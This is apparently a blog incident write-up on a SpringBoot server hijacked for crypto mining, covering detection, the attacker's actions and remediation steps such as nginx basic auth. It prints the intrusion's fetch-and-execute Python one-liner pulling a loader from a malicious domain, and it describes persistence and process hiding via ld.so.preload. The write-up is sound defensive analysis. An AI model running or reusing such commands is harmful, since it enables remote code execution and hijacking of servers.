How a SpringBoot Server Was Hijacked for Crypto Mining and What You Can Do

Server Intrusion Mining Process

The author records the detection, analysis, and remediation of a server that was compromised to run a cryptocurrency miner.

Incident Timeline

While using a phone, the author received an Alibaba Cloud SMS and email alert indicating abnormal server behavior. Using netstat an unusual port was found without an associated program name, suggesting a Java RCE and possible rootkit. Business traffic was quickly migrated to a new instance, the compromised server was powered off, and the intrusion was investigated.

Intrusion Behavior Analysis

The compromised SpringBoot application was get‑shelled, executing a base64‑encoded command that fetched and ran a remote Python script:

python -c 'import urllib;exec urllib.urlopen("http://m.windowsupdatesupport.org/d/loader.py").read()'

The downloaded script performed several malicious actions, including removing security tools, killing processes, creating a .git directory, and downloading a program named kworkers which is a cryptocurrency miner.

Uninstall server security monitoring tools (e.g., Alibaba Cloud Shield).

Terminate all kworkers processes.

Create a .git directory, download the kworkers binary, and execute it.

Monitoring showed a short CPU spike of about five minutes, indicating the miner ran briefly before being stopped.

Server Residual Traces

After rebooting, the following artifacts were discovered:

Crontab entry: 0 2 * * * /xxx/.git/kworkers (persistent execution).

Various files downloaded into the trojan’s home directory, including cert_key.pem and cert.pem.

Extensive logs showing downloads of additional scripts, password harvesting, internal network scanning, and repeated attempts to hide processes.

The hideproc.sh script, which compiles a malicious libc2.28.so shared library and injects it via /etc/ld.so.preload to hide processes from netstat.

Access logs revealing a brute‑force attempt from an IP located in Beijing.

Additional temporary files ( .1, .1.sh) were found in /tmp. The malicious domain windowsupdatesupport.org was registered in June and resolves to foreign IPs, using plain HTTP for delivery.

Remediation Steps

Because the exact vulnerable SpringBoot dependency was not identified, the following mitigations were applied:

Reinstall the operating system on the compromised server.

Run SpringBoot applications under a non‑root user.

Implement basic authentication in Nginx:

apt install -y apache2-utils
htpasswd /etc/nginx/conf.d/.htpasswd user

server {
  ...
  auth_basic "Subsystem Authentication";
  auth_basic_user_file /etc/nginx/conf.d/.htpasswd;
  ...
}

Restrict outbound connections with firewall rules.

These measures reduce the likelihood of recurrence, though locating and patching the vulnerable library remains a priority.

Conclusion

The breach turned out to be a mining trojan that did not alter server data, thanks to timely alerts from Alibaba Cloud. The incident underscores the importance of avoiding root execution, tightening firewall policies, maintaining security monitoring, and regularly backing up data.